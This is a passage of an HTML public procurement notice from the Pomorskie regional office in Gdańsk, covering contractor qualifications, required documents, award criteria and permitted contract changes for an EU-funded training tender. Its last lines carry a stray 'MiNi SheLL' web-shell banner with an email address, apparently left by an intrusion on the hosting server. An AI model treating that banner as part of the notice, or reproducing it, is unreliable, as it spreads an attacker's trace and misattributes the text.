f)	Ekspert ds. szkoleń dot. własności intelektualnej i komercjalizacji rozwiązań innowacyjnych oraz negocjacji umów w zakresie własności intelektualnej - osoba posiadająca przynajmniej wyższe wykształcenie i 5 letni staż pracy oraz wiedzę z zakresu własności intelektualnej i komercjalizacji rozwiązań innowacyjnych, potwierdzoną przeprowadzeniem 3 szkoleń na ww. tematy, w tym przynajmniej jedno szkolenie na temat negocjacji umów w zakresie własności intelektualnej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 100.000 PLN r. W przypadku wygaśnięcia ważności polisy w trakcie realizacji zamówienia Wykonawcy są zobowiązani do jej przedłużenia na okres obejmujący realizację zadania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenie wkonawcy o spełnieniu  warunków udziału w postepowaniu  w trybie art. 22 ust. 1 ustawy. 
2. pisemne zobowiązanie innych podmiotów do oddania wykonawcy  do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3. Informacja na temat przecietnej liczby zatrudnionych pracowników.
 jezeli  wykonawca bedzie polegał na wiedzy i doswiadczeniu oraz potencjale technicznym nnych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany istotnych postanowień umowy w stosunku do treści oferty mogą dotyczyć:
1.1	terminu realizacji zamówienia
1.2	warunków i terminów płatności
1.3	zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT
1.4	organizacji  prac
1.5	harmonogramu prac
1.6	zmiany sposobu realizacji zamówienia, jeśli rozwiązania zaproponowane przez  Zamawiającego lub Wykonawcę przyczynią się do uzyskania wyższej jakości końcowej zamówienia, przy czym zmiana ta nie będzie miała wpływu na wysokość wynagrodzenia Wykonawcy.

2. Zmiany, o których mowa w pkt. 1 mogą nastąpić jedynie w uzasadnionych przypadkach, w szczególności:
	2.1 w przypadku wystąpienia siły wyższej, tj. katastrofa naturalna, strajk, pożar,
                   eksplozja, wojna, atak terrorystyczny,
	2.2 gdy zaistniały okoliczności, których nie można było przewidzieć przy zawarciu 
                   umowy,
2.3 w przypadku: zmian powszechnie obowiązujących przepisów prawa w trakcie realizacji umowy, w szczególności dotyczących przepisów podatkowych, np. zamiany ustawowej stawki podatku VAT
2.4 W zakresie pkt 1.1, 1.2, 1.4, 1.5 w przypadku przedłużenia terminu zakończenia postępowania o udzielenie zamówienia
	2.5  gdy zmiany są korzystne dla Zamawiającego,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woj-pomorskie.pl w Biuletynie Informacji Publicznej Zamówienia Publiczne i Ogłoszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego w Gdańsku, ul. Okopowa 21/27 A pok. 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 10:00, miejsce: Urząd Marszałkowski Województwa Pomorskiego w Gdańsku, ul. Okopowa 21/27 A  Kancelaria Ogólna pok. 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowane ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com